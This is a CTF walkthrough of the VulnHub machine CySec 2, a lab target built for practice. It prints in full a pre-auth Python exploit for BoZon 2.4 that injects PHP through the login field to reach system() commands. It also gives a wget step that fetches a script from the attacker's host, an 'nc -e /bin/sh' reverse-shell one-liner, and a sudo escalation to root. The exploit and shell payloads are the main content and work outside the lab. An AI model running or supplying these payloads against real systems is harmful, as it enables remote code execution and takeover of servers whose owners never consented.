VulnHub: CySec: 2
Today we will take a look at VulnHub: CySec 2. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.
- Network scan
Command: sudo nmap -p- -sV -sC -oN nmap/open --open 192.168.0.115
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b1:00:57:62:be:65:42:f0:ba:3e:c1:47:c5:8d:fb:db (RSA)
| 256 5a:9b:20:89:19:c3:ab:d4:be:06:84:de:e4:30:d4:37 (ECDSA)
|_ 256 08:4b:f3:f8:88:7e:1a:6b:e1:8d:7f:14:60:10:7a:98 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
- Web
When we look at the page source, we see a Base64-encoded string (encoded, not encrypted). Let’s decode it with CyberChef.
view-source:http://192.168.0.115/
Zm9yIGZpcnN0IGZsYWcgY2hlY2sgL2NoYWxsZW5nZS9pbmRleC5waHAKZm9yIHNlY29uZCBmbGFnIGNoZWNrIC9FeG9saXQvaW5kZXgucGhw
for first flag check /challenge/index.php
for second flag check /Exolit/index.php
When we look at /Exolit/index.php, we see that it runs BoZon version 2.4. Searching for that version turns up a pre-auth exploit.
- Exploit
import urllib,urllib2,time
#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit
#Discovery / credits: John Page - Hyp3rlinx/Apparition
#hyp3rlinx.altervista.org
#Exploit: add user account | run phpinfo() command
#=========================================================
EXPLOIT=0
IP=raw_input("[Bozon IP]>")
EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()"))
if EXPLOIT==1:
    CMD="Apparition"
else:
    # Adjacent string literals concatenate, so the login sent is  "];$PWN=phpinfo();////"
    # It closes the quoted PHP string the username is written into, ends the
    # statement, runs phpinfo() and comments out the rest of the line.
    CMD='"];$PWN=''phpinfo();//''//"'
if EXPLOIT != 0:
    url = 'http://'+IP+'/Exolit/index.php'
    data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''})
    req = urllib2.Request(url, data)
    response = urllib2.urlopen(req)
    if EXPLOIT==1:
        print 'Apparition user account created! password: abc123'
    else:
        print "Done!... waiting for phpinfo"
        time.sleep(0.5)
        print response.read()
Running the exploit requires a registered user first, so select 1 to create the account, then log in.
└─$ python2 exploit.py
[Bozon IP]>192.168.0.115
[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()1
Apparition user account created! password: abc123
Let’s enter.
username: Apparition
password: abc123
After selecting the second option and refreshing the page, the phpinfo() output is displayed.
This is the payload that does it:
CMD='"];$PWN=''phpinfo();//''//"'
We can reuse the same shape and swap phpinfo() for a system() call:
CMD='"];system("ls -la");//''//"'
After changing that line, run the exploit again and select option 2, then refresh the page.
The command output appears in the page, so we have code execution.
“You can contact me if you have any questions.”
- Reverse shell
Let’s prepare a small payload script called reverse.sh (this form of the one-liner needs an nc that supports -e on the target):
#!/bin/bash
nc -e /bin/sh YourIP 1234
Now let’s serve it from our machine and fetch it from the target.
Local machine
Command: python3 -m http.server 80
In the exploit, first set
CMD='"];system("wget http://YourIP/reverse.sh");//''//"'
and run option 2 to download the script onto the target, then set
CMD='"];system("bash reverse.sh");//''//"'
and run it again.
Local machine
nc -nvlp 1234
With the listener running, refresh the page and catch the shell.
- CySec2
The flag.txt file contains the password for the cysec2 user.
Command: cat flag.txt
username = cysec2
password = $^WAhuy457i6kj
Command: su cysec2
- Root
Check the sudo privileges of cysec2:
Command: sudo -l
(ALL : ALL) ALL
Command: sudo su
And now we are root.
“If you have any questions or comments, please do not hesitate to write. Have a good day.”